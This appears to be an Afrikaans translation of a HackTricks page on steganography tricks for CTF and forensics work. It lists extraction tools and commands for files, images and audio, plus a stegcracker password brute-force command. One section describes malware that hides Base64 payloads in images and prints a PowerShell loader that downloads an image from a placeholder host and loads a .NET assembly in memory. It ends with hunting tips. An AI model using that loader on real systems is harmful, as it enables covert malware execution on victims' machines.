Stego Truuks

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Uittrekking van data uit lĂȘers

Binwalk

’n Gereedskap om binĂȘre lĂȘers te deursoek vir ingebedde verborge lĂȘers en data. Dit word via apt geĂŻnstalleer en die bronkode is beskikbaar op GitHub.

binwalk file # Displays the embedded data
binwalk -e file # Extracts the data
binwalk --dd ".*" file # Extracts all data

Foremost

Herstel lĂȘers gebaseer op hul lĂȘeropskrifte en voettekste, nuttig vir PNG-beelde. GeĂŻnstalleer via apt met die bron op GitHub.

foremost -i file # Extracts data

Exiftool

Dit help om lĂȘermetadata te besigtig, beskikbaar here.

exiftool file # Shows the metadata

Exiv2

Soortgelyk aan exiftool, vir die besigtiging van metadata. Installeerbaar via apt, bron op GitHub, en het ’n amptelike webwerf.

exiv2 file # Shows the metadata

LĂȘer

Bepaal watter tipe lĂȘer jy hanteer.

Stringe

Haal leesbare stringe uit lĂȘers, met verskeie enkodering-instellings om die uitset te filtreer.

strings -n 6 file # Extracts strings with a minimum length of 6
strings -n 6 file | head -n 20 # First 20 strings
strings -n 6 file | tail -n 20 # Last 20 strings
strings -e s -n 6 file # 7bit strings
strings -e S -n 6 file # 8bit strings
strings -e l -n 6 file # 16bit strings (little-endian)
strings -e b -n 6 file # 16bit strings (big-endian)
strings -e L -n 6 file # 32bit strings (little-endian)
strings -e B -n 6 file # 32bit strings (big-endian)

Vergelyking (cmp)

Nuttig vir die vergelyking van ’n veranderde lĂȘer met sy oorspronklike weergawe wat aanlyn gevind is.

cmp original.jpg stego.jpg -b -l

Uittrekking van verborge data in teks

Verborgen data in spasies

Onsigbare karakters in skynbaar leë spasies kan inligting wegsteek. Om hierdie data te onttrek, besoek https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder.

Uittrekking van data uit beelde

Identifisering van beeldbesonderhede met GraphicMagick

GraphicMagick dien om beeldlĂȘertipes te bepaal en moontlike korrupsie te identifiseer. Voer die onderstaande opdrag uit om ’n beeld te ondersoek:

./magick identify -verbose stego.jpg

Om ’n beskadigde beeld te probeer herstel, kan dit help om ’n metadata-opmerking by te voeg:

./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg

Steghide vir die verberging van data

Steghide maak dit moontlik om data binne JPEG, BMP, WAV, and AU lĂȘers weg te steek; dit kan geĂ«nkripteerde data insluit en ekstraheer. Installering is eenvoudig met apt, en sy bronkode is beskikbaar op GitHub.

Bevels:

  • steghide info file toon of ’n lĂȘer versteekte data bevat.
  • steghide extract -sf file [--passphrase password] ekstraheer die versteekte data; wagwoord opsioneel.

Vir webgebaseerde ekstrahering, besoek hierdie webwerf.

Bruteforce Attack with Stegcracker:

  • To attempt password cracking on Steghide, use stegcracker as follows:
stegcracker <file> [<wordlist>]

zsteg vir PNG- en BMP-lĂȘers

zsteg spesialiseer in die opsporing van versteekte data in PNG- en BMP-lĂȘers. Installering word gedoen via gem install zsteg, met die bron op GitHub.

Opdragte:

  • zsteg -a file pas alle opsporingsmetodes op ’n lĂȘer toe.
  • zsteg -E file spesifiseer ’n payload vir data-ekstraksie.

StegoVeritas en Stegsolve

stegoVeritas kontroleer metadata, voer beeldtransformasies uit, en pas LSB brute forcing toe, onder andere funksies. Gebruik stegoveritas.py -h vir ’n volledige lys opsies en stegoveritas.py stego.jpg om alle kontroles uit te voer.

Stegsolve pas verskeie kleurfilters toe om versteekte teks of boodskappe in beelde te openbaar. Dit is beskikbaar op GitHub.

FFT vir die opsporing van versteekte inhoud

Fast Fourier Transform (FFT)-tegnieke kan versteekte inhoud in beelde openbaar maak. Nuttige hulpbronne sluit in:

Stegpy vir klank- en beeldlĂȘers

Stegpy laat toe om inligting in beeld- en klanklĂȘers in te sluit, en ondersteun formate soos PNG, BMP, GIF, WebP en WAV. Dit is beskikbaar op GitHub.

Pngcheck vir PNG-lĂȘerontleding

Om PNG-lĂȘers te analiseer of hul egtheid te verifieer, gebruik:

apt-get install pngcheck
pngcheck stego.png

Aanvullende gereedskap vir beeldontleding

Vir verdere verkenning, oorweeg om te besoek:

Merkers-afgebakende Base64 payloads versteek in beelde (malware delivery)

Alledaagse loaders verberg al hoe meer Base64-gekodeerde payloads as platte teks binne andersins geldige beelde (dikwels GIF/PNG). In plaas van pixel-vlak LSB word die payload afgebaken deur unieke begin/einde merkerreekse wat in die lĂȘerteks/metadata ingebed is. ’n PowerShell stager doen dan:

  • Laai die beeld oor HTTP(S) af
  • Vind die merkerreekse (waargenome voorbeelde: <<sudo_png>> 
 <<sudo_odt>>)
  • Haal die tussenliggende teks uit en Base64-dekodeer dit na bytes
  • Laai die .NET assembly in geheue en roep ’n bekende entry method aan (geen lĂȘer na skyf geskryf nie)

Minimale PowerShell carving/loading snippet

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Aantekeninge

  • Dit val onder ATT&CK T1027.003 (steganography). Marker strings vary between campaigns.
  • Hunting: scan gedownloade beelde vir bekende delimiters; flag PowerShell using DownloadString followed by FromBase64String.

See also phishing delivery examples and full in-memory invocation flow here:

Phishing Files & Documents

Uittrekking van data uit audiobestande

Audio steganography bied ’n unieke metode om inligting binne klanklĂȘers te verberg. Verskeie gereedskap word gebruik om weggesteekte inhoud in te voeg of te herwin.

Steghide (JPEG, BMP, WAV, AU)

Steghide is ’n veelsydige gereedskap ontwerp om data in JPEG, BMP, WAV en AU-lĂȘers te verberg. Gedetailleerde instruksies word verskaf in die stego tricks documentation.

Stegpy (PNG, BMP, GIF, WebP, WAV)

Hierdie gereedskap is versoenbaar met verskeie formate, insluitend PNG, BMP, GIF, WebP en WAV. Vir meer inligting, verwys na Stegpy’s section.

ffmpeg

ffmpeg is noodsaaklik om die integriteit van audiolĂȘers te beoordeel; dit verskaf gedetailleerde inligting en help om enige afwykings te identifiseer.

ffmpeg -v info -i stego.mp3 -f null -

WavSteg (WAV)

WavSteg blink uit om data in WAV-lĂȘers te verberg en uit te haal deur die least significant bit-strategie te gebruik. Dit is beskikbaar op GitHub. Opdragte sluit in:

python3 WavSteg.py -r -b 1 -s soundfile -o outputfile

python3 WavSteg.py -r -b 2 -s soundfile -o outputfile

Deepsound

Deepsound maak enkripsie en die opsporing van inligting binne klanklĂȘers met AES-256 moontlik. Dit kan afgelaai word vanaf the official page.

Sonic Visualizer

’n Onontbeerlike hulpmiddel vir visuele en analytiese inspeksie van klanklĂȘers — Sonic Visualizer kan verborge elemente openbaar wat op ander maniere onopspoorbaar is. Besoek die official website vir meer.

DTMF Tones - Dial Tones

Die opsporing van DTMF tones in klanklĂȘers kan gedoen word met aanlyn gereedskap soos this DTMF detector en DialABC.

Other Techniques

Binary Length SQRT - QR Code

BinaĂȘre data wat, wanneer gevierkant, ’n heelgetal lewer, kan ’n QR code voorstel. Gebruik hierdie stukkie kode om te kontroleer:

import math
math.sqrt(2500) #50

Vir omskakeling van binĂȘr na beeld, kyk na dcode. Om QR-kodes te lees, gebruik this online barcode reader.

Braille-vertaling

Vir die vertaling van Braille is die Branah Braille Translator ’n uitstekende hulpbron.

Verwysings

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks